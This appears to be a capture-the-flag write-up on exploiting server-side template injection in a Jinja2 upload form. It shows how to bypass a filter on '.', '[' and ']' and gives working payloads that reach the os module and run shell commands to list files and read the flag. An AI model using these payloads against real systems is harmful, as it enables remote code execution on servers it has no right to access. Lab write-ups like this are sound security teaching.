Rating: 3.3

This challenge was about exploiting an SSTI in the title field of the upload form

After few tries it seems like the characters `.` `[` and `]` are all filtered.

No worries, we can replace `.` with `|attr()`
and `[]` with `|attr('__getitem__')(INDEX_or_KEY)`

Solution is quite easy, no need to go into details:
we just have to look for the `os` module from `__globals__` and execute a shell command with `popen`

```python
{{config|attr('__class__')|attr('__init__')|attr('__globals__')|attr('__getitem__')('os')|attr('popen')('ls')|attr('read')()}}

app.py db_handler.py flag.txt patch.txt static templates uploads
```

```python
{{config|attr('__class__')|attr('__init__')|attr('__globals__')|attr('__getitem__')('os')|attr('popen')('cat flag*')|attr('read')()}}

shellmates{tR0ll1nG_@_mem3R_w1tH_4_w3ll_cr4fT3d_1nj3ct10n}
```

Flag: `shellmates{tR0ll1nG_@_mem3R_w1tH_4_w3ll_cr4fT3d_1nj3ct10n}`